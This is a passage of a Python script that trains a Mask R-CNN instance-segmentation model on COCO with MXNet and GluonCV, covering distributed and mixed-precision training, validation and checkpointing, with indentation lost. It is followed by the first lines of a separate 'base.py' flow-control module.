os.environ['MXNET_GPU_COPY_NTHREADS'] = '1'
os.environ['MXNET_OPTIMIZER_AGGREGATION_SIZE'] = '54'
import logging
import time
import numpy as np
import mxnet as mx
from mxnet import gluon
from mxnet import autograd
from mxnet.contrib import amp
import gluoncv as gcv
gcv.utils.check_version('0.7.0')
from gluoncv import data as gdata
from gluoncv import utils as gutils
from gluoncv.model_zoo import get_model
from gluoncv.data import batchify
from gluoncv.data.transforms.presets.rcnn import MaskRCNNDefaultTrainTransform, \
MaskRCNNDefaultValTransform
from gluoncv.utils.metrics.coco_instance import COCOInstanceMetric
from gluoncv.utils.metrics.rcnn import RPNAccMetric, RPNL1LossMetric, RCNNAccMetric, \
RCNNL1LossMetric, MaskAccMetric, MaskFGAccMetric
from gluoncv.utils.parallel import Parallelizable, Parallel
from gluoncv.data import COCODetection, VOCDetection
from multiprocessing import Process
try:
import horovod.mxnet as hvd
except ImportError:
hvd = None
try:
from mpi4py import MPI
except ImportError:
logging.info('mpi4py is not installed. Use "pip install --no-cache mpi4py" to install')
MPI = None
# from mxnet import profiler
def parse_args():
parser = argparse.ArgumentParser(description='Train Mask R-CNN network end to end.')
parser.add_argument('--network', type=str, default='resnet50_v1b',
help="Base network name which serves as feature extraction base.")
parser.add_argument('--dataset', type=str, default='coco',
help='Training dataset. Now support coco.')
parser.add_argument('--num-workers', '-j', dest='num_workers', type=int,
default=4, help='Number of data workers, you can use larger '
'number to accelerate data loading, if you CPU and GPUs '
'are powerful.')
parser.add_argument('--batch-size', type=int, default=8, help='Training mini-batch size.')
parser.add_argument('--gpus', type=str, default='0',
help='Training with GPUs, you can specify 1,3 for example.')
parser.add_argument('--epochs', type=str, default='',
help='Training epochs.')
parser.add_argument('--resume', type=str, default='',
help='Resume from previously saved parameters if not None. '
'For example, you can resume from ./mask_rcnn_xxx_0123.params')
parser.add_argument('--start-epoch', type=int, default=0,
help='Starting epoch for resuming, default is 0 for new training.'
'You can specify it to 100 for example to start from 100 epoch.')
parser.add_argument('--lr', type=str, default='',
help='Learning rate, default is 0.01 for coco 8 gpus training.')
parser.add_argument('--lr-decay', type=float, default=0.1,
help='decay rate of learning rate. default is 0.1.')
parser.add_argument('--lr-decay-epoch', type=str, default='',
help='epochs at which learning rate decays. default is 17,23 for coco.')
parser.add_argument('--lr-warmup', type=str, default='',
help='warmup iterations to adjust learning rate, default is 1000 for coco.')
parser.add_argument('--lr-warmup-factor', type=float, default=1. / 3.,
help='warmup factor of base lr.')
parser.add_argument('--clip-gradient', type=float, default=-1., help='gradient clipping.')
parser.add_argument('--momentum', type=float, default=0.9,
help='SGD momentum, default is 0.9')
parser.add_argument('--wd', type=str, default='',
help='Weight decay, default is 1e-4 for coco')
parser.add_argument('--log-interval', type=int, default=100,
help='Logging mini-batch interval. Default is 100.')
parser.add_argument('--save-prefix', type=str, default='',
help='Saving parameter prefix')
parser.add_argument('--save-interval', type=int, default=1,
help='Saving parameters epoch interval, best model will always be saved.')
parser.add_argument('--val-interval', type=int, default=1,
help='Epoch interval for validation, increase the number will reduce the '
'training time if validation is slow.')
parser.add_argument('--seed', type=int, default=233,
help='Random seed to be fixed.')
parser.add_argument('--verbose', dest='verbose', action='store_true',
help='Print helpful debugging info once set.')
# Norm layer options
parser.add_argument('--norm-layer', type=str, default=None,
help='Type of normalization layer to use. '
'If set to None, backbone normalization layer will be fixed,'
' and no normalization layer will be used. '
'Currently supports \'bn\', and None, default is None')
# Loss options
parser.add_argument('--rpn-smoothl1-rho', type=float, default=1. / 9.,
help='RPN box regression transition point from L1 to L2 loss.'
'Set to 0.0 to make the loss simply L1.')
parser.add_argument('--rcnn-smoothl1-rho', type=float, default=1.,
help='RCNN box regression transition point from L1 to L2 loss.'
'Set to 0.0 to make the loss simply L1.')
# FPN options
parser.add_argument('--use-fpn', action='store_true',
help='Whether to use feature pyramid network.')
# Performance options
parser.add_argument('--disable-hybridization', action='store_true',
help='Whether to disable hybridize the entire model. '
'Memory usage and speed will decrese.')
parser.add_argument('--static-alloc', action='store_true',
help='Whether to use static memory allocation. Memory usage will increase.')
parser.add_argument('--amp', action='store_true',
help='Use MXNet AMP for mixed precision training.')
parser.add_argument('--horovod', action='store_true',
help='Use MXNet Horovod for distributed training. Must be run with OpenMPI. '
'--gpus is ignored when using --horovod.')
parser.add_argument('--use-ext', action='store_true',
help='Use NVIDIA MSCOCO API. Make sure you install first')
parser.add_argument('--executor-threads', type=int, default=1,
help='Number of threads for executor for scheduling ops. '
'More threads may incur higher GPU memory footprint, '
'but may speed up throughput. Note that when horovod is used, '
'it is set to 1.')
parser.add_argument('--kv-store', type=str, default='nccl',
help='KV store options. local, device, nccl, dist_sync, dist_device_sync, '
'dist_async are available.')
# Advanced options. Expert Only!! Currently non-FPN model is not supported!!
# Default setting is for MS-COCO.
# The following options are only used if custom-model is enabled
subparsers = parser.add_subparsers(dest='custom_model')
custom_model_parser = subparsers.add_parser(
'custom-model',
help='Use custom Faster R-CNN w/ FPN model. This is for expert only!'
' You can modify model internal parameters here. Once enabled, '
'custom model options become available.')
custom_model_parser.add_argument(
'--no-pretrained-base', action='store_true', help='Disable pretrained base network.')
custom_model_parser.add_argument(
'--num-fpn-filters', type=int, default=256, help='Number of filters in FPN output layers.')
custom_model_parser.add_argument(
'--num-box-head-conv', type=int, default=4,
help='Number of convolution layers to use in box head if '
'batch normalization is not frozen.')
custom_model_parser.add_argument(
'--num-box-head-conv-filters', type=int, default=256,
help='Number of filters for convolution layers in box head.'
' Only applicable if batch normalization is not frozen.')
custom_model_parser.add_argument(
'--num_box_head_dense_filters', type=int, default=1024,
help='Number of hidden units for the last fully connected layer in '
'box head.')
custom_model_parser.add_argument(
'--image-short', type=str, default='800',
help='Short side of the image. Pass a tuple to enable random scale augmentation.')
custom_model_parser.add_argument(
'--image-max-size', type=int, default=1333,
help='Max size of the longer side of the image.')
custom_model_parser.add_argument(
'--nms-thresh', type=float, default=0.5,
help='Non-maximum suppression threshold for R-CNN. '
'You can specify < 0 or > 1 to disable NMS.')
custom_model_parser.add_argument(
'--nms-topk', type=int, default=-1,
help='Apply NMS to top k detection results in R-CNN. '
'Set to -1 to disable so that every Detection result is used in NMS.')
custom_model_parser.add_argument(
'--post-nms', type=int, default=-1,
help='Only return top `post_nms` detection results, the rest is discarded.'
' Set to -1 to return all detections.')
custom_model_parser.add_argument(
'--roi-mode', type=str, default='align', choices=['align', 'pool'],
help='ROI pooling mode. Currently support \'pool\' and \'align\'.')
custom_model_parser.add_argument(
'--roi-size', type=str, default='14,14',
help='The output spatial size of ROI layer. eg. ROIAlign, ROIPooling')
custom_model_parser.add_argument(
'--strides', type=str, default='4,8,16,32,64',
help='Feature map stride with respect to original image. '
'This is usually the ratio between original image size and '
'feature map size. Since the custom model uses FPN, it is a list of ints')
custom_model_parser.add_argument(
'--clip', type=float, default=4.14,
help='Clip bounding box transformation predictions '
'to prevent exponentiation from overflowing')
custom_model_parser.add_argument(
'--rpn-channel', type=int, default=256,
help='Number of channels used in RPN convolution layers.')
custom_model_parser.add_argument(
'--anchor-base-size', type=int, default=16,
help='The width(and height) of reference anchor box.')
custom_model_parser.add_argument(
'--anchor-aspect-ratio', type=str, default='0.5,1,2',
help='The aspect ratios of anchor boxes.')
custom_model_parser.add_argument(
'--anchor-scales', type=str, default='2,4,8,16,32',
help='The scales of anchor boxes with respect to base size. '
'We use the following form to compute the shapes of anchors: '
'anchor_width = base_size * scale * sqrt(1 / ratio)'
'anchor_height = base_size * scale * sqrt(ratio)')
custom_model_parser.add_argument(
'--anchor-alloc-size', type=str, default='384,384',
help='Allocate size for the anchor boxes as (H, W). '
'We generate enough anchors for large feature map, e.g. 384x384. '
'During inference we can have variable input sizes, '
'at which time we can crop corresponding anchors from this large '
'anchor map so we can skip re-generating anchors for each input. ')
custom_model_parser.add_argument(
'--rpn-nms-thresh', type=float, default='0.7',
help='Non-maximum suppression threshold for RPN.')
custom_model_parser.add_argument(
'--rpn-train-pre-nms', type=int, default=12000,
help='Filter top proposals before NMS in RPN training.')
custom_model_parser.add_argument(
'--rpn-train-post-nms', type=int, default=2000,
help='Return top proposal results after NMS in RPN training. '
'Will be set to rpn_train_pre_nms if it is larger than '
'rpn_train_pre_nms.')
custom_model_parser.add_argument(
'--rpn-test-pre-nms', type=int, default=6000,
help='Filter top proposals before NMS in RPN testing.')
custom_model_parser.add_argument(
'--rpn-test-post-nms', type=int, default=1000,
help='Return top proposal results after NMS in RPN testing. '
'Will be set to rpn_test_pre_nms if it is larger than rpn_test_pre_nms.')
custom_model_parser.add_argument(
'--rpn-min-size', type=int, default=1,
help='Proposals whose size is smaller than ``min_size`` will be discarded.')
custom_model_parser.add_argument(
'--rcnn-num-samples', type=int, default=512, help='Number of samples for RCNN training.')
custom_model_parser.add_argument(
'--rcnn-pos-iou-thresh', type=float, default=0.5,
help='Proposal whose IOU larger than ``pos_iou_thresh`` is '
'regarded as positive samples for R-CNN.')
custom_model_parser.add_argument(
'--rcnn-pos-ratio', type=float, default=0.25,
help='``pos_ratio`` defines how many positive samples '
'(``pos_ratio * num_sample``) is to be sampled for R-CNN.')
custom_model_parser.add_argument(
'--max-num-gt', type=int, default=100,
help='Maximum ground-truth number for each example. This is only an upper bound, not'
'necessarily very precise. However, using a very big number may impact the '
'training speed.')
custom_model_parser.add_argument(
'--target-roi-scale', type=int, default=2,
help='Ratio of mask output roi / input roi. '
'For model with FPN, this is typically 2.')
custom_model_parser.add_argument(
'--num-mask-head-convs', type=int, default=4,
help='Number of convolution blocks before deconv layer for mask head. '
'For FPN network this is typically 4.')
args = parser.parse_args()
if args.horovod:
if hvd is None:
raise SystemExit("Horovod not found, please check if you installed it correctly.")
hvd.init()
args.epochs = int(args.epochs) if args.epochs else 26
args.lr_decay_epoch = args.lr_decay_epoch if args.lr_decay_epoch else '17,23'
args.lr = float(args.lr) if args.lr else (0.00125 * args.batch_size)
args.lr_warmup = args.lr_warmup if args.lr_warmup else max((8000 / args.batch_size), 1000)
args.wd = float(args.wd) if args.wd else 1e-4
def str_args2num_args(arguments, args_name, num_type):
try:
ret = [num_type(x) for x in arguments.split(',')]
if len(ret) == 1:
return ret[0]
return ret
except ValueError:
raise ValueError('invalid value for', args_name, arguments)
if args.custom_model:
args.image_short = str_args2num_args(args.image_short, '--image-short', int)
args.roi_size = str_args2num_args(args.roi_size, '--roi-size', int)
args.strides = str_args2num_args(args.strides, '--strides', int)
args.anchor_aspect_ratio = str_args2num_args(args.anchor_aspect_ratio,
'--anchor-aspect-ratio', float)
args.anchor_scales = str_args2num_args(args.anchor_scales, '--anchor-scales', float)
args.anchor_alloc_size = str_args2num_args(args.anchor_alloc_size,
'--anchor-alloc-size', int)
if args.amp and args.norm_layer == 'bn':
raise NotImplementedError('SyncBatchNorm currently does not support AMP.')
return args
def get_dataset(dataset, args):
if dataset.lower() == 'coco':
train_dataset = gdata.COCOInstance(splits='instances_train2017')
val_dataset = gdata.COCOInstance(splits='instances_val2017', skip_empty=False)
starting_id = 0
if args.horovod and MPI:
length = len(val_dataset)
shard_len = length // hvd.size()
rest = length % hvd.size()
# Compute the start index for this partition
starting_id = shard_len * hvd.rank() + min(hvd.rank(), rest)
val_metric = COCOInstanceMetric(val_dataset, args.save_prefix + '_eval',
use_ext=args.use_ext, starting_id=starting_id)
else:
raise NotImplementedError('Dataset: {} not implemented.'.format(dataset))
if args.horovod and MPI:
val_dataset = val_dataset.shard(hvd.size(), hvd.rank())
return train_dataset, val_dataset, val_metric
def get_dataloader(net, train_dataset, val_dataset, train_transform, val_transform, batch_size,
num_shards_per_process, args):
"""Get dataloader."""
train_bfn = batchify.MaskRCNNTrainBatchify(net, num_shards_per_process)
train_sampler = \
gcv.nn.sampler.SplitSortedBucketSampler(train_dataset.get_im_aspect_ratio(),
batch_size,
num_parts=hvd.size() if args.horovod else 1,
part_index=hvd.rank() if args.horovod else 0,
shuffle=True)
train_loader = mx.gluon.data.DataLoader(train_dataset.transform(
train_transform(net.short, net.max_size, net, ashape=net.ashape, multi_stage=args.use_fpn)),
batch_sampler=train_sampler, batchify_fn=train_bfn, num_workers=args.num_workers)
val_bfn = batchify.Tuple(*[batchify.Append() for _ in range(2)])
short = net.short[-1] if isinstance(net.short, (tuple, list)) else net.short
# validation use 1 sample per device
val_loader = mx.gluon.data.DataLoader(
val_dataset.transform(val_transform(short, net.max_size)), num_shards_per_process, False,
batchify_fn=val_bfn, last_batch='keep', num_workers=args.num_workers)
return train_loader, val_loader
def save_params(net, logger, best_map, current_map, epoch, save_interval, prefix):
current_map = float(current_map)
if current_map > best_map[0]:
logger.info('[Epoch {}] mAP {} higher than current best {} saving to {}'.format(
epoch, current_map, best_map, '{:s}_best.params'.format(prefix)))
best_map[0] = current_map
net.save_parameters('{:s}_best.params'.format(prefix))
with open(prefix + '_best_map.log', 'a') as f:
f.write('\n{:04d}:\t{:.4f}'.format(epoch, current_map))
if save_interval and (epoch + 1) % save_interval == 0:
logger.info('[Epoch {}] Saving parameters to {}'.format(
epoch, '{:s}_{:04d}_{:.4f}.params'.format(prefix, epoch, current_map)))
net.save_parameters('{:s}_{:04d}_{:.4f}.params'.format(prefix, epoch, current_map))
def _stage_data(i, data, ctx_list, pinned_data_stage):
def _get_chunk(data, storage):
s = storage.reshape(shape=(storage.size,))
s = s[:data.size]
s = s.reshape(shape=data.shape)
data.copyto(s)
return s
if ctx_list[0].device_type == "cpu":
return data
if i not in pinned_data_stage:
pinned_data_stage[i] = [d.as_in_context(mx.cpu_pinned()) for d in data]
return pinned_data_stage[i]
storage = pinned_data_stage[i]
for j in range(len(storage)):
if data[j].size > storage[j].size:
storage[j] = data[j].as_in_context(mx.cpu_pinned())
return [_get_chunk(d, s) for d, s in zip(data, storage)]
pinned_data_stage = {}
def split_and_load(batch, ctx_list):
"""Split data to 1 batch each device."""
new_batch = []
for i, data in enumerate(batch):
if isinstance(data, (list, tuple)):
new_data = [x.as_in_context(ctx) for x, ctx in zip(data, ctx_list)]
else:
new_data = [data.as_in_context(ctx_list[0])]
new_batch.append(new_data)
return new_batch
def validate(net, val_data, async_eval_processes, ctx, eval_metric, logger, epoch, best_map, args):
"""Test on validation dataset."""
clipper = gcv.nn.bbox.BBoxClipToImage()
eval_metric.reset()
if not args.disable_hybridization:
net.hybridize(static_alloc=args.static_alloc)
tic = time.time()
for ib, batch in enumerate(val_data):
batch = split_and_load(batch, ctx_list=ctx)
det_bboxes = []
det_ids = []
det_scores = []
det_masks = []
det_infos = []
for x, im_info in zip(*batch):
# get prediction results
ids, scores, bboxes, masks = net(x)
det_bboxes.append(clipper(bboxes, x))
det_ids.append(ids)
det_scores.append(scores)
det_masks.append(masks)
det_infos.append(im_info)
# update metric
for det_bbox, det_id, det_score, det_mask, det_info in zip(det_bboxes, det_ids, det_scores,
det_masks, det_infos):
for i in range(det_info.shape[0]):
# numpy everything
det_bbox = det_bbox[i].asnumpy()
det_id = det_id[i].asnumpy()
det_score = det_score[i].asnumpy()
det_mask = det_mask[i].asnumpy()
det_info = det_info[i].asnumpy()
# filter by conf threshold
im_height, im_width, im_scale = det_info
valid = np.where(((det_id >= 0) & (det_score >= 0.001)))[0]
det_id = det_id[valid]
det_score = det_score[valid]
det_bbox = det_bbox[valid] / im_scale
det_mask = det_mask[valid]
# fill full mask
im_height, im_width = int(round(im_height / im_scale)), int(
round(im_width / im_scale))
full_masks = gdata.transforms.mask.fill(det_mask, det_bbox, (im_width, im_height))
eval_metric.update(det_bbox, det_id, det_score, full_masks)
if args.horovod and MPI is not None:
comm = MPI.COMM_WORLD
res = comm.gather(eval_metric.get_result_buffer(), root=0)
if hvd.rank() == 0:
logger.info('[Epoch {}] Validation Inference cost: {:.3f}'
.format(epoch, (time.time() - tic)))
rank0_res = eval_metric.get_result_buffer()
if len(rank0_res) == 2:
res = res[1:]
rank0_res[0].extend([item for res_tuple in res for item in res_tuple[0]])
rank0_res[1].extend([item for res_tuple in res for item in res_tuple[1]])
else:
rank0_res.extend([item for r in res for item in r])
def coco_eval_save_task(eval_metric, logger):
map_name, mean_ap = eval_metric.get()
if map_name and mean_ap is not None:
val_msg = '\n'.join(['{}={}'.format(k, v) for k, v in zip(map_name, mean_ap)])
logger.info('[Epoch {}] Validation: \n{}'.format(epoch, val_msg))
current_map = float(mean_ap[-1])
save_params(net, logger, best_map, current_map, epoch, args.save_interval,
args.save_prefix)
if not args.horovod or hvd.rank() == 0:
p = Process(target=coco_eval_save_task, args=(eval_metric, logger))
async_eval_processes.append(p)
p.start()
def get_lr_at_iter(alpha, lr_warmup_factor=1. / 3.):
return lr_warmup_factor * (1 - alpha) + alpha
class ForwardBackwardTask(Parallelizable):
def __init__(self, net, optimizer, rpn_cls_loss, rpn_box_loss, rcnn_cls_loss, rcnn_box_loss,
rcnn_mask_loss):
super(ForwardBackwardTask, self).__init__()
self.net = net
self._optimizer = optimizer
self.rpn_cls_loss = rpn_cls_loss
self.rpn_box_loss = rpn_box_loss
self.rcnn_cls_loss = rcnn_cls_loss
self.rcnn_box_loss = rcnn_box_loss
self.rcnn_mask_loss = rcnn_mask_loss
def forward_backward(self, x):
data, label, gt_mask, rpn_cls_targets, rpn_box_targets, rpn_box_masks = x
with autograd.record():
gt_label = label[:, :, 4:5]
gt_box = label[:, :, :4]
cls_pred, box_pred, mask_pred, roi, samples, matches, rpn_score, rpn_box, anchors, \
cls_targets, box_targets, box_masks, indices = self.net(data, gt_box, gt_label)
# losses of rpn
rpn_score = rpn_score.squeeze(axis=-1)
num_rpn_pos = (rpn_cls_targets >= 0).sum()
rpn_loss1 = self.rpn_cls_loss(rpn_score, rpn_cls_targets,
rpn_cls_targets >= 0) * rpn_cls_targets.size / num_rpn_pos
rpn_loss2 = self.rpn_box_loss(rpn_box, rpn_box_targets,
rpn_box_masks) * rpn_box.size / num_rpn_pos
# rpn overall loss, use sum rather than average
rpn_loss = rpn_loss1 + rpn_loss2
# losses of rcnn
num_rcnn_pos = (cls_targets >= 0).sum()
rcnn_loss1 = self.rcnn_cls_loss(cls_pred, cls_targets,
cls_targets.expand_dims(-1) >= 0) * cls_targets.size / \
num_rcnn_pos
rcnn_loss2 = self.rcnn_box_loss(box_pred, box_targets, box_masks) * box_pred.size / \
num_rcnn_pos
rcnn_loss = rcnn_loss1 + rcnn_loss2
# generate targets for mask
roi = mx.nd.concat(
*[mx.nd.take(roi[i], indices[i]) for i in range(indices.shape[0])], dim=0) \
.reshape((indices.shape[0], -1, 4))
m_cls_targets = mx.nd.concat(
*[mx.nd.take(cls_targets[i], indices[i]) for i in range(indices.shape[0])], dim=0) \
.reshape((indices.shape[0], -1))
matches = mx.nd.concat(
*[mx.nd.take(matches[i], indices[i]) for i in range(indices.shape[0])], dim=0) \
.reshape((indices.shape[0], -1))
mask_targets, mask_masks = self.net.mask_target(roi, gt_mask, matches, m_cls_targets)
# loss of mask
mask_loss = self.rcnn_mask_loss(mask_pred, mask_targets, mask_masks) * \
mask_targets.size / mask_masks.sum()
# overall losses
total_loss = rpn_loss.sum() + rcnn_loss.sum() + mask_loss.sum()
rpn_loss1_metric = rpn_loss1.mean()
rpn_loss2_metric = rpn_loss2.mean()
rcnn_loss1_metric = rcnn_loss1.sum()
rcnn_loss2_metric = rcnn_loss2.sum()
mask_loss_metric = mask_loss.sum()
rpn_acc_metric = [[rpn_cls_targets, rpn_cls_targets >= 0], [rpn_score]]
rpn_l1_loss_metric = [[rpn_box_targets, rpn_box_masks], [rpn_box]]
rcnn_acc_metric = [[cls_targets], [cls_pred]]
rcnn_l1_loss_metric = [[box_targets, box_masks], [box_pred]]
rcnn_mask_metric = [[mask_targets, mask_masks], [mask_pred]]
rcnn_fgmask_metric = [[mask_targets, mask_masks], [mask_pred]]
if args.amp:
with amp.scale_loss(total_loss, self._optimizer) as scaled_losses:
autograd.backward(scaled_losses)
else:
total_loss.backward()
return rpn_loss1_metric, rpn_loss2_metric, rcnn_loss1_metric, rcnn_loss2_metric, \
mask_loss_metric, rpn_acc_metric, rpn_l1_loss_metric, rcnn_acc_metric, \
rcnn_l1_loss_metric, rcnn_mask_metric, rcnn_fgmask_metric
def train(net, train_data, val_data, eval_metric, batch_size, ctx, logger, args):
"""Training pipeline"""
args.kv_store = 'device' if (args.amp and 'nccl' in args.kv_store) else args.kv_store
kv = mx.kvstore.create(args.kv_store)
net.collect_params().setattr('grad_req', 'null')
net.collect_train_params().setattr('grad_req', 'write')
for k, v in net.collect_params('.*bias').items():
v.wd_mult = 0.0
optimizer_params = {'learning_rate': args.lr, 'wd': args.wd, 'momentum': args.momentum, }
if args.clip_gradient > 0.0:
optimizer_params['clip_gradient'] = args.clip_gradient
if args.amp:
optimizer_params['multi_precision'] = True
if args.horovod:
hvd.broadcast_parameters(net.collect_params(), root_rank=0)
trainer = hvd.DistributedTrainer(
net.collect_train_params(), # fix batchnorm, fix first stage, etc...
'sgd',
optimizer_params
)
else:
trainer = gluon.Trainer(
net.collect_train_params(), # fix batchnorm, fix first stage, etc...
'sgd',
optimizer_params,
update_on_kvstore=(False if args.amp else None),
kvstore=kv)
if args.amp:
amp.init_trainer(trainer)
# lr decay policy
lr_decay = float(args.lr_decay)
lr_steps = sorted([float(ls) for ls in args.lr_decay_epoch.split(',') if ls.strip()])
lr_warmup = float(args.lr_warmup) # avoid int division
rpn_cls_loss = mx.gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False)
rpn_box_loss = mx.gluon.loss.HuberLoss(rho=args.rpn_smoothl1_rho) # == smoothl1
rcnn_cls_loss = mx.gluon.loss.SoftmaxCrossEntropyLoss()
rcnn_box_loss = mx.gluon.loss.HuberLoss(rho=args.rcnn_smoothl1_rho) # == smoothl1
rcnn_mask_loss = mx.gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False)
metrics = [mx.metric.Loss('RPN_Conf'),
mx.metric.Loss('RPN_SmoothL1'),
mx.metric.Loss('RCNN_CrossEntropy'),
mx.metric.Loss('RCNN_SmoothL1'),
mx.metric.Loss('RCNN_Mask')]
rpn_acc_metric = RPNAccMetric()
rpn_bbox_metric = RPNL1LossMetric()
rcnn_acc_metric = RCNNAccMetric()
rcnn_bbox_metric = RCNNL1LossMetric()
rcnn_mask_metric = MaskAccMetric()
rcnn_fgmask_metric = MaskFGAccMetric()
metrics2 = [rpn_acc_metric, rpn_bbox_metric,
rcnn_acc_metric, rcnn_bbox_metric,
rcnn_mask_metric, rcnn_fgmask_metric]
async_eval_processes = []
logger.info(args)
if args.verbose:
logger.info('Trainable parameters:')
logger.info(net.collect_train_params().keys())
logger.info('Start training from [Epoch {}]'.format(args.start_epoch))
best_map = [0]
base_lr = trainer.learning_rate
rcnn_task = ForwardBackwardTask(net, trainer, rpn_cls_loss, rpn_box_loss, rcnn_cls_loss,
rcnn_box_loss, rcnn_mask_loss)
executor = Parallel(args.executor_threads, rcnn_task) if not args.horovod else None
for epoch in range(args.start_epoch, args.epochs):
if not args.disable_hybridization:
net.hybridize(static_alloc=args.static_alloc)
while lr_steps and epoch >= lr_steps[0]:
new_lr = trainer.learning_rate * lr_decay
lr_steps.pop(0)
trainer.set_learning_rate(new_lr)
logger.info("[Epoch {}] Set learning rate to {}".format(epoch, new_lr))
for metric in metrics:
metric.reset()
tic = time.time()
btic = time.time()
train_data_iter = iter(train_data)
next_data_batch = next(train_data_iter)
next_data_batch = split_and_load(next_data_batch, ctx_list=ctx)
for i in range(len(train_data)):
batch = next_data_batch
if i + epoch * len(train_data) <= lr_warmup:
# adjust based on real percentage
new_lr = base_lr * get_lr_at_iter((i + epoch * len(train_data)) / lr_warmup,
args.lr_warmup_factor)
if new_lr != trainer.learning_rate:
if i % args.log_interval == 0:
logger.info('[Epoch {} Iteration {}] Set learning rate to {}'
.format(epoch, i, new_lr))
trainer.set_learning_rate(new_lr)
metric_losses = [[] for _ in metrics]
add_losses = [[] for _ in metrics2]
if executor is not None:
for data in zip(*batch):
executor.put(data)
for j in range(len(ctx)):
if executor is not None:
result = executor.get()
else:
result = rcnn_task.forward_backward(list(zip(*batch))[0])
if (not args.horovod) or hvd.rank() == 0:
for k in range(len(metric_losses)):
metric_losses[k].append(result[k])
for k in range(len(add_losses)):
add_losses[k].append(result[len(metric_losses) + k])
try:
# prefetch next batch
next_data_batch = next(train_data_iter)
next_data_batch = split_and_load(next_data_batch, ctx_list=ctx)
except StopIteration:
pass
for metric, record in zip(metrics, metric_losses):
metric.update(0, record)
for metric, records in zip(metrics2, add_losses):
for pred in records:
metric.update(pred[0], pred[1])
trainer.step(batch_size)
if (not args.horovod or hvd.rank() == 0) and args.log_interval \
and not (i + 1) % args.log_interval:
msg = ','.join(['{}={:.3f}'.format(*metric.get()) for metric in metrics + metrics2])
logger.info('[Epoch {}][Batch {}], Speed: {:.3f} samples/sec, {}'.format(
epoch, i, args.log_interval * args.batch_size / (time.time() - btic), msg))
btic = time.time()
# validate and save params
if (not args.horovod) or hvd.rank() == 0:
msg = ','.join(['{}={:.3f}'.format(*metric.get()) for metric in metrics])
logger.info('[Epoch {}] Training cost: {:.3f}, {}'.format(
epoch, (time.time() - tic), msg))
if not (epoch + 1) % args.val_interval:
# consider reduce the frequency of validation to save time
validate(net, val_data, async_eval_processes, ctx, eval_metric, logger, epoch, best_map,
args)
elif (not args.horovod) or hvd.rank() == 0:
current_map = 0.
save_params(net, logger, best_map, current_map, epoch, args.save_interval,
args.save_prefix)
for thread in async_eval_processes:
thread.join()
if __name__ == '__main__':
args = parse_args()
# fix seed for mxnet, numpy and python builtin random generator.
gutils.random.seed(args.seed)
if args.amp:
amp.init()
# training contexts
if args.horovod:
ctx = [mx.gpu(hvd.local_rank())]
else:
ctx = [mx.gpu(int(i)) for i in args.gpus.split(',') if i.strip()]
ctx = ctx if ctx else [mx.cpu()]
# network
kwargs = {}
module_list = []
if args.use_fpn:
module_list.append('fpn')
if args.norm_layer is not None:
module_list.append(args.norm_layer)
if args.norm_layer == 'bn':
kwargs['num_devices'] = len(ctx)
num_gpus = hvd.size() if args.horovod else len(ctx)
net_name = '_'.join(('mask_rcnn', *module_list, args.network, args.dataset))
if args.custom_model:
args.use_fpn = True
net_name = '_'.join(('mask_rcnn_fpn', args.network, args.dataset))
if args.norm_layer == 'bn':
norm_layer = gluon.contrib.nn.SyncBatchNorm
norm_kwargs = {'num_devices': len(ctx)}
sym_norm_layer = mx.sym.contrib.SyncBatchNorm
sym_norm_kwargs = {'ndev': len(ctx)}
elif args.norm_layer == 'gn':
norm_layer = gluon.nn.GroupNorm
norm_kwargs = {'groups': 8}
sym_norm_layer = mx.sym.GroupNorm
sym_norm_kwargs = {'groups': 8}
else:
norm_layer = gluon.nn.BatchNorm
norm_kwargs = None
sym_norm_layer = None
sym_norm_kwargs = None
if args.dataset == 'coco':
classes = COCODetection.CLASSES
else:
# default to VOC
classes = VOCDetection.CLASSES
net = get_model('custom_mask_rcnn_fpn', classes=classes, transfer=None,
dataset=args.dataset, pretrained_base=not args.no_pretrained_base,
base_network_name=args.network, norm_layer=norm_layer,
norm_kwargs=norm_kwargs, sym_norm_kwargs=sym_norm_kwargs,
num_fpn_filters=args.num_fpn_filters,
num_box_head_conv=args.num_box_head_conv,
num_box_head_conv_filters=args.num_box_head_conv_filters,
num_box_head_dense_filters=args.num_box_head_dense_filters,
short=args.image_short, max_size=args.image_max_size, min_stage=2,
max_stage=6, nms_thresh=args.nms_thresh, nms_topk=args.nms_topk,
post_nms=args.post_nms, roi_mode=args.roi_mode, roi_size=args.roi_size,
strides=args.strides, clip=args.clip, rpn_channel=args.rpn_channel,
base_size=args.anchor_base_size, scales=args.anchor_scales,
ratios=args.anchor_aspect_ratio, alloc_size=args.anchor_alloc_size,
rpn_nms_thresh=args.rpn_nms_thresh,
rpn_train_pre_nms=args.rpn_train_pre_nms,
rpn_train_post_nms=args.rpn_train_post_nms,
rpn_test_pre_nms=args.rpn_test_pre_nms,
rpn_test_post_nms=args.rpn_test_post_nms, rpn_min_size=args.rpn_min_size,
per_device_batch_size=args.batch_size // num_gpus,
num_sample=args.rcnn_num_samples, pos_iou_thresh=args.rcnn_pos_iou_thresh,
pos_ratio=args.rcnn_pos_ratio, max_num_gt=args.max_num_gt,
target_roi_scale=args.target_roi_scale,
num_fcn_convs=args.num_mask_head_convs)
else:
net = get_model(net_name, pretrained_base=True,
per_device_batch_size=args.batch_size // num_gpus, **kwargs)
args.save_prefix += net_name
if args.resume.strip():
net.load_parameters(args.resume.strip())
else:
for param in net.collect_params().values():
if param._data is not None:
continue
param.initialize()
net.collect_params().reset_ctx(ctx)
if args.amp:
# Cast both weights and gradients to 'float16'
net.cast('float16')
# This layers doesn't support type 'float16'
net.collect_params('.*batchnorm.*').setattr('dtype', 'float32')
net.collect_params('.*normalizedperclassboxcenterencoder.*').setattr('dtype', 'float32')
# set up logger
logging.basicConfig()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
log_file_path = args.save_prefix + '_train.log'
log_dir = os.path.dirname(log_file_path)
if log_dir and not os.path.exists(log_dir):
os.makedirs(log_dir)
fh = logging.FileHandler(log_file_path)
logger.addHandler(fh)
if MPI is None and args.horovod:
logger.warning('mpi4py is not installed, validation result may be incorrect.')
# training data
train_dataset, val_dataset, eval_metric = get_dataset(args.dataset, args)
batch_size = args.batch_size // num_gpus if args.horovod else args.batch_size
train_data, val_data = get_dataloader(
net, train_dataset, val_dataset, MaskRCNNDefaultTrainTransform, MaskRCNNDefaultValTransform,
batch_size, len(ctx), args)
# training
train(net, train_data, val_data, eval_metric, batch_size, ctx, logger, args)
|
base.py
|
import sys
import threading
import logging
import time
logger = logging.getLogger("interchange.strategy.base")
class BaseStrategy(object):
"""Implements threshold-interval based flow control.
The overall goal is to trap the flow of apps from the
